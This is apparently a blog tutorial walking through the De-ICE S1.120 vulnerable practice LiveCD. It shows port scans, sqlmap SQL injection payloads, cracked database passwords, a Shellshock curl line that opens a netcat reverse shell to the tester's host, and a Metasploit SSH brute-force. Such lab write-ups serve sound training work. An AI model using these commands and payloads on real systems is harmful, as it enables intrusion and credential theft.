Tutorial

All posts tagged Tutorial

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.120

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso

Default IP 192.168.1.120

Flags:
1. Create list of open ports
2. This is primarily a web penetration test act accordingly
3. Obtain access to file system
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: Rummage about in the file system

Spoilers and Walkthrough

Port scan the image to get started.

root@SNM-KScan-2:~# nmap -sV -T4 192.168.1.120

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-07 13:53 MST
Nmap scan report for 192.168.1.120
Host is up (0.00047s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:A4:37:1E (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds

This is primarily a vulnerable web app so I started working with html injection on the http://192.168.1.120/add_product.php page
<h1>htmlinjection</h1>
<h1>htmlinjection1</h1>
<h1>htmlinjection2</h1>
Normally if you can get html injection it is possible to get XSS if you can bypass whatever filter is in place. I only use the number to keep track of which injection actually worked. I used burp to capture the request. Then saved it and loaded it into SQL map. the -r is what I named the file and -p is the name of the parameter to attack.

sqlmap -r /root/Desktop/deice/120webrequest -p price

No joy so lets hit it a little harder

sqlmap -r /root/Desktop/deice/120webrequest -p price --level=5 --risk=3

Nope lets try the other parameters

sqlmap -r /root/Desktop/deice/120webrequest -p product --level=5 --risk=3
sqlmap -r /root/Desktop/deice/120webrequest -p description --level=5 --risk=3

I might have busted it but there is another parameter here you can test. Feed the id parameter to sqlmap using the –wizard option http://192.168.1.120/products.php?id=1

sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3

root@SNM-KScan-2:~# sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:43:07

[14:43:07] [INFO] parsing HTTP request from '/root/Desktop/deice/120webrequest2'
[14:43:07] [INFO] testing connection to the target URL
[14:43:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[14:43:08] [INFO] target URL is stable
[14:43:08] [INFO] testing if GET parameter 'id' is dynamic
[14:43:08] [INFO] confirming that GET parameter 'id' is dynamic
[14:43:08] [INFO] GET parameter 'id' is dynamic
[14:43:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[14:43:09] [INFO] testing for SQL injection on GET parameter 'id'
[14:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:43:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable

BOOM goes the dynamite! and now we wait while sqlmap handles its business. If you don’t want to mess with Burp the same command is:

sqlmap --banner --dbms=mysql -u "http://192.168.1.120/products.php?id=1"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:05:47

[09:05:47] [INFO] testing connection to the target URL
[09:05:47] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:05:48] [INFO] target URL is stable
[09:05:48] [INFO] testing if GET parameter 'id' is dynamic
[09:05:49] [INFO] confirming that GET parameter 'id' is dynamic
[09:05:49] [INFO] GET parameter 'id' is dynamic
[09:05:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[09:05:49] [INFO] testing for SQL injection on GET parameter 'id'
[09:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:05:49] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[09:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:05:49] [INFO] testing 'MySQL inline queries'
[09:05:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:05:49] [WARNING] time-based comparison requires larger statistical model, please wait..................                                          
[09:05:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:06:00] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[09:06:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:06:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:06:00] [WARNING] reflective value(s) found and filtering out
[09:06:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1082=1082

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[09:06:14] [INFO] the back-end DBMS is MySQL
[09:06:14] [INFO] fetching banner
[09:06:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:06:14] [INFO] retrieved: 5.1.33
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
banner:    '5.1.33'
[09:06:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 09:06:16

It is time to get down on the database.

sqlmap --dbms=mysql -u "http://192.168.1.120/products.php?id=1" --users --passwords -o --threads=8 --time-sec=1

****Partial output This takes awhile****
database management system users [50]:
[*] 'aadams'@'localhost'
[*] 'aallen'@'localhost'
[*] 'aard'@'localhost'
[*] 'aharp'@'localhost'
[*] 'aheflin'@'localhost'
[*] 'amaynard'@'localhost'
[*] 'aspears'@'localhost'
[*] 'aweiland'@'localhost'
[*] 'bbanter'@'localhost'
[*] 'bphillips'@'localhost'
[*] 'bwatkins'@'localhost'
[*] 'cchisholm'@'localhost'
[*] 'ccoffee'@'localhost'
[*] 'dcooper'@'localhost'
[*] 'dgilfillan'@'localhost'
[*] 'dgrant'@'localhost'
[*] 'djohnson'@'localhost'
[*] 'dstevens'@'localhost'
[*] 'dtraylor'@'localhost'
[*] 'dwestling'@'localhost'
[*] 'hlovell'@'localhost'
[*] 'jalcantar'@'localhost'
[*] 'jalvarez'@'localhost'
[*] 'jayala'@'localhost'
[*] 'jbresnahan'@'localhost'
[*] 'jdavenport'@'localhost'
[*] 'jduff'@'localhost'
[*] 'jfranklin'@'localhost'
[*] 'kclemons'@'localhost'
[*] 'krenfro'@'localhost'
[*] 'ktso'@'localhost'
[*] 'kwebber'@'localhost'
[*] 'lmartinez'@'localhost'
[*] 'lmorales'@'localhost'
[*] 'mbryan'@'localhost'
[*] 'mholland'@'localhost'
[*] 'mnader'@'localhost'
[*] 'mrodriguez'@'localhost'
[*] 'myajima'@'localhost'
[*] 'qpowers'@'localhost'
[*] 'rdominguez'@'localhost'
[*] 'rjacobson'@'localhost'
[*] 'rpatel'@'localhost'
[*] 'sgains'@'localhost'
[*] 'sjohnson'@'localhost'
[*] 'strammel'@'localhost'
[*] 'swarren'@'localhost'
[*] 'tdeleon'@'localhost'
[*] 'tgoodchap'@'localhost'
[*] 'webapp'@'localhost'

When it retrieves the password hashes. You will get prompted to let sqlmap crack them automatically.
Just note that there are so many user names and passwords that the next couple pages are a mass spoiler.

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:47:24] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-XtKh9b.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[09:47:39] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 2
what's the custom dictionary's location?
> /usr/share/wordlists/rockyou.txt
[09:48:22] [INFO] using custom dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[*] aadams [1]:
    password hash: *F491287896471CB21030790BF46865C4A39DE651
    clear-text password: batman
[*] aallen [1]:
    password hash: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E
    clear-text password: superman
[*] aard [1]:
    password hash: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7
    clear-text password: cheese
[*] aharp [1]:
    password hash: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC
    clear-text password: pokemon
[*] aheflin [1]:
    password hash: *90837F291B744BBE86DF95A37D2B2524185DBBF5
    clear-text password: whatever
[*] amaynard [1]:
    password hash: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0
    clear-text password: kotaku
[*] aspears [1]:
    password hash: *CFBF459D9D6057BC2A85477A38327B96F06B1597
    clear-text password: iloveyou
[*] aweiland [1]:
    password hash: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC
    clear-text password: 666666
[*] bbanter [1]:
    password hash: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4
    clear-text password: michelle
[*] bphillips [1]:
    password hash: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1
    clear-text password: 123123
[*] bwatkins [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    clear-text password: 123456
[*] cchisholm [1]:
    password hash: *51AA306E66303073DBA15D2750E23C90C7A7F947
    clear-text password: baseball
[*] ccoffee [1]:
    password hash: *B12289EEF8752AD620294A64A37CD586223AB454
    clear-text password: 0
[*] dcooper [1]:
    password hash: *D6B63C1953E7F096DB307F8AC48C4AD703E57001
    clear-text password: sunshine
[*] dgilfillan [1]:
    password hash: *24B8599BAF46DD4B4D8DB50A3B10136457492622
    clear-text password: starwars
[*] dgrant [1]:
    password hash: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004
    clear-text password: letmein
[*] djohnson [1]:
    password hash: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8
    clear-text password: killer
[*] dstevens [1]:
    password hash: *797420C584EBF42750EB523104268BA0FD87FBC8
    clear-text password: internet
[*] dtraylor [1]:
    password hash: *79BF466BCC601BD91A0897BB162421F9BA8C29CA
[*] dwestling [1]:
    password hash: *7B2F14D9BB629E334CD49A1028BD85750F7D3530
    clear-text password: shadow
[*] hlovell [1]:
    password hash: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91
    clear-text password: consumer
[*] jalcantar [1]:
    password hash: *46CFC7938B60837F46B610A2D10C248874555C14
    clear-text password: trustno1
[*] jalvarez [1]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    clear-text password: password
[*] jayala [1]:
    password hash: *6691484EA6B50DDDE1926A220DA01FA9E575C18A
    clear-text password: abc123
[*] jbresnahan [1]:
    password hash: *446525BB82B5E22BD9E525261D37C494F623C52B
    clear-text password: blahblah
[*] jdavenport [1]:
    password hash: *61305383748FBEAB119F9A8BC35EBBADB4889A9D
[*] jduff [1]:
    password hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
    clear-text password: princess
[*] jfranklin [1]:
    password hash: *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5
    clear-text password: 654321
[*] kclemons [1]:
    password hash: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
    clear-text password: passw0rd
[*] krenfro [1]:
    password hash: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41
    clear-text password: master
[*] ktso [1]:
    password hash: *A4B6157319038724E3560894F7F932C8886EBFCF
    clear-text password: 1234
[*] kwebber [1]:
    password hash: *F8E113FD51D520075836A4B815568BA2B96F7C30
    clear-text password: dragon
[*] lmartinez [1]:
    password hash: *626AC8265C7D53693CB7478376CE1B4825DFF286
    clear-text password: pepper
[*] lmorales [1]:
    password hash: *FCAAF3F0BD94C027B2769A95903C355CE6294660
    clear-text password: football
[*] mbryan [1]:
    password hash: *B021918A5DCA54916CF724573179571DFC37AC88
    clear-text password: jennifer
[*] mholland [1]:
    password hash: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC
    clear-text password: jordan
[*] mnader [1]:
    password hash: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2
    clear-text password: welcome
[*] mrodriguez [1]:
    password hash: *AA1420F182E88B9E5F874F6FBE7459291E8F4601
    clear-text password: qwerty
[*] myajima [1]:
    password hash: *3EEB06BE54EABF909DC8F6107110777F1DE43186
[*] qpowers [1]:
    password hash: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00
    clear-text password: michael
[*] rdominguez [1]:
    password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9
    clear-text password: 12345
[*] rjacobson [1]:
    password hash: *FD571203974BA9AFE270FE62151AE967ECA5E0AA
    clear-text password: 111111
[*] rpatel [1]:
    password hash: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5
    clear-text password: 1234567
[*] sgains [1]:
    password hash: *81101DED975D54BD76A3C8EAD293597AE9BB143F
    clear-text password: computer
[*] sjohnson [1]:
    password hash: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1
    clear-text password: 12345678
[*] strammel [1]:
    password hash: *A5892368AE83685440A1E27D012306B073BDF5B7
    clear-text password: monkey
[*] swarren [1]:
    password hash: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594
    clear-text password: Password
[*] tdeleon [1]:
    password hash: *94F3DC3F398B76269CAAD51627279D4233A6C89A
    clear-text password: soccer
[*] tgoodchap [1]:
    password hash: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9
    clear-text password: nintendo
[*] webapp [1]:
    password hash: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F

We know that we have SQL injection but lets hit it with nikto also. This thing is a wreck.

root@SNM-KScan-2:~# nikto -h 192.168.1.120
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2015-01-08 09:21:21 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.26)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8429, size: 30894, mtime: Fri May 11 06:40:36 2007
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7354 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time:           2015-01-08 09:22:12 (GMT-7) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So I’m not giving up on Shellshock.

curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 192.168.1.130 5005"'  http://192.168.1.120/cgi-bin/printenv.cgi

Nope no joy. Lets try some metasploit attacks. Port 631 was listening and we have usernames and password.

use exploit/multi/http/cups_bash_env_exec

Even less joy. Sigh…lets just try the reversed passwords for the accounts. Our old friends ccoffee, bbanter and aadams are all there.

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                Required  Description
   ----              ---------------                --------  -----------
   BLANK_PASSWORDS   false                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  3                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                          no        Add all users in the current database to the list
   PASSWORD                                         no        A specific password to authenticate with
   PASS_FILE                                        no        File containing passwords, one per line
   RHOSTS            192.168.1.120                  yes       The target address range or CIDR identifier
   RPORT             22                             yes       The target port
   STOP_ON_SUCCESS   false                          yes       Stop guessing when a credential works for a host
   THREADS           1                              yes       The number of concurrent threads
   USERNAME                                         no        A specific username to authenticate as
   USERPASS_FILE     /root/Desktop/deice/users.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                          no        Try the username as the password for all users
   USER_FILE                                        no        File containing usernames, one per line
   VERBOSE           true                           yes       Whether to print output for all attempts


msf auxiliary(ssh_login) > run

[*] 192.168.1.120:22 SSH - Starting bruteforce
[+] 192.168.1.120:22 SSH - Success: 'aadams:batman' 'uid=1003(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.1.130:60840 -> 192.168.1.120:22) at 2015-01-08 12:28:52 -0700
[+] 192.168.1.120:22 SSH - Success: 'aallen:superman' 'uid=1031(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 2 opened (192.168.1.130:33943 -> 192.168.1.120:22) at 2015-01-08 12:28:55 -0700
[+] 192.168.1.120:22 SSH - Success: 'aard:cheese' 'uid=1000(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 3 opened (192.168.1.130:49918 -> 192.168.1.120:22) at 2015-01-08 12:28:59 -0700
[+] 192.168.1.120:22 SSH - Success: 'aharp:pokemon' 'uid=1039(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 4 opened (192.168.1.130:38831 -> 192.168.1.120:22) at 2015-01-08 12:29:02 -0700
[+] 192.168.1.120:22 SSH - Success: 'aheflin:whatever' 'uid=1017(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 5 opened (192.168.1.130:43816 -> 192.168.1.120:22) at 2015-01-08 12:29:05 -0700
[+] 192.168.1.120:22 SSH - Success: 'amaynard:kotaku' 'uid=1018(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 6 opened (192.168.1.130:52789 -> 192.168.1.120:22) at 2015-01-08 12:29:08 -0700
[+] 192.168.1.120:22 SSH - Success: 'aspears:iloveyou' 'uid=1035(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 7 opened (192.168.1.130:47274 -> 192.168.1.120:22) at 2015-01-08 12:29:11 -0700
[+] 192.168.1.120:22 SSH - Success: 'aweiland:666666' 'uid=1032(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 8 opened (192.168.1.130:55692 -> 192.168.1.120:22) at 2015-01-08 12:29:15 -0700
[+] 192.168.1.120:22 SSH - Success: 'bbanter:michelle' 'uid=1012(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 9 opened (192.168.1.130:47768 -> 192.168.1.120:22) at 2015-01-08 12:29:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'bphillips:123123' 'uid=1024(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 10 opened (192.168.1.130:53612 -> 192.168.1.120:22) at 2015-01-08 12:29:22 -0700
[+] 192.168.1.120:22 SSH - Success: 'bwatkins:123456' 'uid=1037(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 11 opened (192.168.1.130:47820 -> 192.168.1.120:22) at 2015-01-08 12:29:26 -0700
[+] 192.168.1.120:22 SSH - Success: 'cchisholm:baseball' 'uid=1022(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 12 opened (192.168.1.130:54756 -> 192.168.1.120:22) at 2015-01-08 12:29:29 -0700
[+] 192.168.1.120:22 SSH - Success: 'ccoffee:0' 'uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 13 opened (192.168.1.130:55911 -> 192.168.1.120:22) at 2015-01-08 12:29:33 -0700
[+] 192.168.1.120:22 SSH - Success: 'dcooper:sunshine' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 14 opened (192.168.1.130:47440 -> 192.168.1.120:22) at 2015-01-08 12:29:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgilfillan:starwars' 'uid=1014(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 15 opened (192.168.1.130:51523 -> 192.168.1.120:22) at 2015-01-08 12:29:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgrant:letmein' 'uid=1015(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 16 opened (192.168.1.130:43905 -> 192.168.1.120:22) at 2015-01-08 12:29:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'djohnson:killer' 'uid=1011(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 17 opened (192.168.1.130:58887 -> 192.168.1.120:22) at 2015-01-08 12:29:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'dstevens:internet' 'uid=1023(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 18 opened (192.168.1.130:42132 -> 192.168.1.120:22) at 2015-01-08 12:29:51 -0700
[+] 192.168.1.120:22 SSH - Success: 'dwestling:shadow' 'uid=1025(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 19 opened (192.168.1.130:37133 -> 192.168.1.120:22) at 2015-01-08 12:29:54 -0700
[+] 192.168.1.120:22 SSH - Success: 'hlovell:consumer' 'uid=1021(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 20 opened (192.168.1.130:43957 -> 192.168.1.120:22) at 2015-01-08 12:29:57 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalcantar:trustno1' 'uid=1040(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 21 opened (192.168.1.130:36937 -> 192.168.1.120:22) at 2015-01-08 12:30:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalvarez:password' 'uid=1013(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 22 opened (192.168.1.130:42853 -> 192.168.1.120:22) at 2015-01-08 12:30:04 -0700
[+] 192.168.1.120:22 SSH - Success: 'jayala:abc123' 'uid=1029(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 23 opened (192.168.1.130:34358 -> 192.168.1.120:22) at 2015-01-08 12:30:07 -0700
